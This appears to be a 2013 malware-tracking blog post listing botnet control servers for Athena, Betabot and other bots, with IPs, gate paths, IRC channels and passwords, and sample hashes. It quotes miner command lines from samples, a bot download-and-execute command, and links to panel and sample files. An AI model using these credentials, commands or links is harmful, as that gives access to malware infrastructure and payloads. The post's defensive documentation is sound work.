Resolved insane.pirate-the.net to 91.234.104.150
Server: insane.pirate-the.net
Gate file: /here/gate.php
Thanks to whoever uploaded this on malwr
Hosting infos: http://whois.domaintools.com/91.234.104.150
Related md5s (search on malwr.com to download the samples):
Athena http: e0046f2d10c7c790cf07d258cdafe299
synd1cat3.com (Athena http botnet hosted by hostlatte.com)
Resolved synd1cat3.com to 192.95.33.40
Server: synd1cat3.com
Gate file: /kJuN2p/gate.php
Hosting infos: http://whois.domaintools.com/192.95.33.40
Related md5s (search on malwr.com to download the samples):
Athena http: 88730b35c88269066e191695cf1e148d
mena012.no-ip.biz (Athena and Betabot http botnets hosted by santrex.net)
Resolved mena012.no-ip.biz to 46.166.173.11
Athena http
Server: mena012.no-ip.biz
Gate file: /gate.php
Betabot
Server: mena012.no-ip.biz
Gate file: /beta/order.php
Hosting infos: http://whois.domaintools.com/46.166.173.11
betabros.in (Several http botnets hosted by hostkey.ru)
Resolved betabros.in to 146.0.78.4
Server: betabros.in
Gate file: /beta/order.php
The owner should keep a closer eye on the fake forum he set up for cover. 1071 pages of pharmacy spam and counting.
Hosting infos: http://whois.domaintools.com/146.0.78.4
EDIT: Bitcoin and litecoin mining.
macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x
shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p x
satanic-surfer.biz (Athena http botnet hosted by eternalhost.fr)
Resolved satanic-surfer.biz to 5.39.35.240
Server: satanic-surfer.biz
Gate file: /gate.php
hxxp://satanic-surfer.biz/panel.zip
Hosting infos: http://whois.domaintools.com/5.39.35.240
dictionarysrnifty.no-ip.org (Athena irc botnet hosted by infiumhost.com)
Resolved dictionarysrnifty.no-ip.org to 188.190.99.19
Server: dictionarysrnifty.no-ip.org
Port: 9001
* I have 83 clients and 0 servers
* 83 451 :Current local users 83, max 451
Channel: #alpha
Topic for #alpha is: !botkill.start
Topic for #alpha set by LK at Fri Mar 29 10:30:08 2013
All users are also joined to the channel #lobby on connection.
truboot.org (Athena http botnet hosted by edenhost.com)
Resolved truboot.org to 94.242.205.226
Server: truboot.org
Gate file: /at/gate.php
This is the http version of the Athena irc bot, which has graced this blog many times.
Login page located at truboot.org/at/login/index.php
Hosting infos: http://whois.domaintools.com/94.242.205.226
xjnhtraj.com (Athena irc botnet hosted by tatacommunications.com)
Server: xjnhtraj.com
Port: 6667
Channel: #xjnhtraj
Channel password: xjnhtraj
Opers:
[dwa] (dada@chidaica123): đuawa
[dwa] #xjnhtraj
[dwa] irc.server.net :IRC server
[dwa] is a Bot on IRC server
[dwa] idle 00:01:17, signon: Mon Mar 11 15:15:07
[dwa] End of WHOIS list.
[Troc] (trocdsds@chidaica123): Troc
[Troc] #xjnhtraj
[Troc] irc.server.net :IRC server
[Troc] is a Bot on IRC server
[Troc] idle 00:02:11, signon: Mon Mar 11...
filehelp.us (Various irc bots hosted by securedservers.com)
Resolved filehelp.us to 184.95.37.155
Athena
Server: filehelp.us
Port: 7200
Channel: #Athena
Insomnia
Server: filehelp.us
Port: 4242
Channel: #insomnia
Channel password: k6geyzs
Dixie bot
Server: filehelp.us
Port: 4242
Channel: #DDoS#
hxxp://filehelp.us/Panel/gate.php
aryan bot
184.95.37.155:5557
Server Password:
Username: 5644413
Nickname: New{DE-XP-x86}5644413
Channel: #aryan (Password: k6geyzs)
Channeltopic: :.dl hxxp://filehelp.us/upload/files/bin.exe 1
Other samples here hxxp://filehelp.us/upload/
Opers are Vapor and...
filestorage.ws (37.221.170.221) (Athena irc botnet hosted by voxility.net)
Resolved filestorage.ws to 157.101.50.101 => Athena l33t ip decryption => 37.221.170.221
Athena now comes with a tool to crypt the server IP so that the address the domain points to is not the correct one. A disgruntled customer has already released the crypting program so anyone who doesn’t have access to a binary can try...